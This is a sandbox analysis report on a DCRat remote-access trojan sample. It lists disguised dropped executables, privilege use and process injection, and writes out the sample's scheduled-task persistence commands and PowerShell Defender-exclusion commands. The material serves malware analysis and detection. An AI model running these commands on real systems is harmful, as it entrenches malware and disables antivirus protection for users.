Malware Analysis Report

2025-08-05 17:32

Sample ID 221101-mq9fjabhem
Target d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a
SHA256 d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a
Tags
rat dcrat infostealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a

Threat Level: Known bad

The file d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a was found to be: Known bad.

Malicious Activity Summary

rat dcrat infostealer

Dcrat family

Process spawned unexpected child process

DCRat payload

DcRat

DCRat payload

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-11-01 10:41

Signatures

DCRat payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Dcrat family

dcrat

Analysis: behavioral1

Detonation Overview

Submitted

2022-11-01 10:41

Reported

2022-11-01 10:43

Platform

win10-20220901-en

Max time kernel

146s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe
(the row above appears 48 times in the report, each a separate schtasks.exe launch recorded under wmiprvse.exe)

DCRat payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
(the row above appears 15 times in the report)

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Windows Media Player\winlogon.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Windows Media Player\cc11b995f2a76d | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Windows Security\BrowserCore\5b884080fd4f94 | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Windows Portable Devices\spoolsv.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Windows Portable Devices\f3b6ecef712a24 | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Uninstall Information\dllhost.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Program Files\Uninstall Information\5940a34987c991 | C:\providercommon\DllCommonsvc.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\twain_32\spoolsv.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Windows\twain_32\f3b6ecef712a24 | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Windows\BitLockerDiscoveryVolumeContents\ebf1f9fa8afd6d | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Windows\InfusedApps\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\System.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe | C:\providercommon\DllCommonsvc.exe | N/A
File created | C:\Windows\appcompat\appraiser\Telemetry\f3b6ecef712a24 | C:\providercommon\DllCommonsvc.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
(the row above appears 48 times in the report, one per schtasks.exe invocation)

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | N/A
(the row above appears 11 times in the report)

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A
(the row above appears 27 times in the report)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
(the row above appears 37 times in the report)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\providercommon\DllCommonsvc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
(the row above appears 14 times in the report)
Token: SeDebugPrivilege | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1460 wrote to memory of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe | C:\Windows\SysWOW64\WScript.exe
PID 1460 wrote to memory of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe | C:\Windows\SysWOW64\WScript.exe
PID 1460 wrote to memory of 4512 | N/A | C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe | C:\Windows\SysWOW64\WScript.exe
PID 4512 wrote to memory of 4736 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4736 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4736 | N/A | C:\Windows\SysWOW64\WScript.exe | C:\Windows\SysWOW64\cmd.exe
PID 4736 wrote to memory of 3104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\providercommon\DllCommonsvc.exe
PID 4736 wrote to memory of 3104 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\providercommon\DllCommonsvc.exe
PID 3104 wrote to memory of 2248 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2248 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2472 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2472 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2548 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2548 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4796 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4796 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3912 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3912 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5112 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5112 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4052 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4052 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4440 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4440 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3420 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3420 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3624 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3624 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2772 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2772 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3640 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3640 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3448 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3448 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5108 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5108 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4200 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4200 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4144 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4144 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4204 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4204 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 376 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 3104 wrote to memory of 376 | N/A | C:\providercommon\DllCommonsvc.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 376 wrote to memory of 5440 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 376 wrote to memory of 5440 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 5440 wrote to memory of 5668 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe
PID 5440 wrote to memory of 5668 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe
PID 5440 wrote to memory of 6132 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5440 wrote to memory of 6132 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 6132 wrote to memory of 5148 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 6132 wrote to memory of 5148 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 5148 wrote to memory of 5204 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe
PID 5148 wrote to memory of 5204 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe
PID 5148 wrote to memory of 5220 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5148 wrote to memory of 5220 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5220 wrote to memory of 5344 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 5220 wrote to memory of 5344 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 5344 wrote to memory of 5448 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe
PID 5344 wrote to memory of 5448 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\w32tm.exe
PID 5344 wrote to memory of 5460 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5344 wrote to memory of 5460 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5460 wrote to memory of 5284 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe
PID 5460 wrote to memory of 5284 | N/A | C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe | C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe

"C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "

C:\providercommon\DllCommonsvc.exe

"C:\providercommon\DllCommonsvc.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\odt\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\twain_32\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\twain_32\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\providercommon\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\odt\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Desktop\DllCommonsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\All Users\Desktop\DllCommonsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Desktop\DllCommonsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sihost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

